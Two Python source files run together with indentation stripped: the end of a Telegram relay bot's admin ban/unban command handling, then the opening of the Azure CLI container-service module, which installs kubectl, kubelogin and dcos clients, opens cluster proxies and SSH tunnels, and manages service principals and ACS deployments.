and update.message.chat_id == CONFIG['Admin']:
if update.message.reply_to_message:
if str(update.message.reply_to_message.message_id) in message_list:
sender_id = message_list[str(update.message.reply_to_message.message_id)]['sender_id']
preference_list[str(sender_id)]['blocked'] = True
bot.send_message(chat_id=update.message.chat_id,
text=LANG['ban_user']
% (preference_list[str(sender_id)]['name'],
str(sender_id)),
parse_mode=telegram.ParseMode.MARKDOWN)
bot.send_message(chat_id=sender_id,text=LANG['be_blocked_alert'])
else:
bot.send_message(chat_id=update.message.chat_id,text=LANG['reply_to_message_no_data'])
else:
bot.send_message(chat_id=update.message.chat_id,text=LANG['reply_to_no_message'])
else:
bot.send_message(chat_id=update.message.chat_id, text=LANG['not_an_admin'])
elif command[0] == 'unban': # 解禁用户
if update.message.from_user.id == CONFIG['Admin'] \
and update.message.chat_id == CONFIG['Admin']:
if update.message.reply_to_message:
if str(update.message.reply_to_message.message_id) in message_list:
sender_id = message_list[str(update.message.reply_to_message.message_id)]['sender_id']
preference_list[str(sender_id)]['blocked'] = False
bot.send_message(chat_id=update.message.chat_id,
text=LANG['unban_user']
% (preference_list[str(sender_id)]['name'],
str(sender_id)),
parse_mode=telegram.ParseMode.MARKDOWN)
bot.send_message(chat_id=sender_id,text=LANG['be_unbanned'])
else:
bot.send_message(chat_id=update.message.chat_id,text=LANG['reply_to_message_no_data'])
elif len(command) == 2:
if command[1] in preference_list:
preference_list[command[1]]['blocked'] = False
bot.send_message(chat_id=update.message.chat_id,
text=LANG['unban_user']
% (preference_list[command[1]]['name'],
command[1]),
parse_mode=telegram.ParseMode.MARKDOWN)
bot.send_message(chat_id=int(command[1]),text=LANG['be_unbanned'])
else:
bot.send_message(chat_id=update.message.chat_id,text=LANG['user_not_found'])
else:
bot.send_message(chat_id=update.message.chat_id,text=LANG['reply_or_enter_id'])
else:
bot.send_message(chat_id=update.message.chat_id, text=LANG['not_an_admin'])
else: # 指令不存在
bot.send_message(chat_id=update.message.chat_id, text=LANG['nonexistent_command'])
# 添加Handle
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.all
& telegram.ext.Filters.private
& ~telegram.ext.Filters.command
& ~telegram.ext.Filters.status_update,
process_msg)) # 处理消息
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.command
& telegram.ext.Filters.private, process_command)) # 处理指令
updater.start_polling() # 开始轮询
print('Started')
updater.idle()
print('Stopping...')
save_data() # 保存消息数据
save_preference() # 保存用户资料与设置
print('Data saved.')
print('Stopped.')
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.v2020_09_01.models import ManagedCluster
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterIdentity
from azure.mgmt.containerservice.v2020_09_01.models import AgentPool
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterSKU
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterWindowsProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import NetworkProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterMonitorProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_managed_clusters
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
import zipfile
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None,
kubelogin_version='latest', kubelogin_install_location=None):
k8s_install_kubectl(cmd, client_version, install_location)
k8s_install_kubelogin(cmd, kubelogin_version, kubelogin_install_location)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
source_url = 'https://github.com/Azure/kubelogin/releases/download'
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"', download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
